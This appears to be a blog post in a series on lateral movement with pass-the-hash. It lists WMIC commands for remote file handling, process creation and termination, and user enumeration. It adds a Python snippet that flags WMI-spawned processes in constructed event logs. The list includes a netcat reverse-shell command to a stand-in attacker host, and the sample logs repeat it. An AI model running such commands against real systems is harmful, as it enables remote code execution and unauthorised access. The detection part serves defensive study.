Oct 29, 2019

In the previous article we introduced the use of WMIC from a "pass the hash" shell.

Below is a list of useful wmic commands gathered from around the internet:

rem remember impersonate is ok but delegate is not
rem (wmic /impersonation:impersonate is the default and works remotely; delegate needs Kerberos delegation configured for the account)

rem become familiar with the available aliases
wmic alias list brief
rem see the available methods for any class
wmic [class] call /?

rem file stuff
wmic /node:target datafile where "drive='c:' AND path='\\windows\\'" get Name,readable,size
wmic /node:target datafile "c:\\temp\\test.txt" call rename c:\temp\abc.txt
wmic /node:target datafile "c:\\temp\\test.txt" call copy c:\temp\abc.txt

rem process stuff
wmic /node:target process call create "nc attacker-ip 9000 -e cmd.exe"
wmic /node:target process call create "cmd.exe /c echo test > c:\temp\test.txt"
wmic /node:target process where name="explorer.exe" call terminate
wmic /node:target process where processid="1234" call terminate
wmic /node:target process get name,processid

rem users and groups stuff
wmic /node:target useraccount list brief
wmic /node:target path Win32_GroupUser
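A defensive counterpart to the "process stuff" commands above, added here as an example and not part of the original post: a process started on the target with `wmic /node:... process call create` is spawned by the WMI provider host, WmiPrvSE.exe, so process-creation records whose parent is WmiPrvSE.exe are the usual tell. The field names follow the Security event 4688 layout, but every line, host and path below is constructed.

```python
"""Flag process-creation records whose parent is the WMI provider host.

Remote `wmic /node:<host> process call create ...` runs the new process
under WmiPrvSE.exe on the target, so a parent of WmiPrvSE.exe is the
usual tell. The records below are constructed, not real telemetry.
"""
import re

# Constructed lines in the shape of Security event 4688 summaries
# (hosts, users and paths are made up for the example).
SAMPLE_4688 = [
    'Computer=ws01 NewProcessName=C:\\Windows\\System32\\cmd.exe '
    'CreatorProcessName=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe '
    'CommandLine="cmd.exe /c echo test > c:\\temp\\test.txt" SubjectUserName=svc-admin',
    'Computer=ws01 NewProcessName=C:\\Windows\\explorer.exe '
    'CreatorProcessName=C:\\Windows\\System32\\userinit.exe '
    'CommandLine="explorer.exe" SubjectUserName=alice',
    'Computer=ws02 NewProcessName=C:\\Tools\\nc.exe '
    'CreatorProcessName=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe '
    'CommandLine="nc 10.0.0.5 9000 -e cmd.exe" SubjectUserName=svc-admin',
]

# key=value pairs; a quoted value may contain spaces and escaped characters
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
WMI_HOST = "wmiprvse.exe"


def parse_4688(line):
    """Split a key=value summary line into a dict, dropping value quotes."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def is_wmi_spawned(record):
    """True when the parent (CreatorProcessName) is WmiPrvSE.exe."""
    parent = record.get("CreatorProcessName", "")
    return parent.rsplit("\\", 1)[-1].lower() == WMI_HOST


def find_wmi_spawned(lines):
    """Return (host, user, command line) for each WMI-spawned process."""
    hits = []
    for line in lines:
        rec = parse_4688(line)
        if is_wmi_spawned(rec):
            hits.append((rec["Computer"], rec["SubjectUserName"], rec["CommandLine"]))
    return hits


if __name__ == "__main__":
    for host, user, cmd in find_wmi_spawned(SAMPLE_4688):
        print(f"{host}: WMI-spawned process as {user}: {cmd}")
```

WmiPrvSE.exe also parents legitimate local WMI activity, so in practice the hit list is joined with network logon events (4624 type 3) from the same source before it is treated as lateral movement.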

One Response to "Demonstrating lateral movement with NTHASH Part #5"

1. […] psremoting on the remote target host (use wmic / see previous article) : powershell.exe "enable-psremoting […]
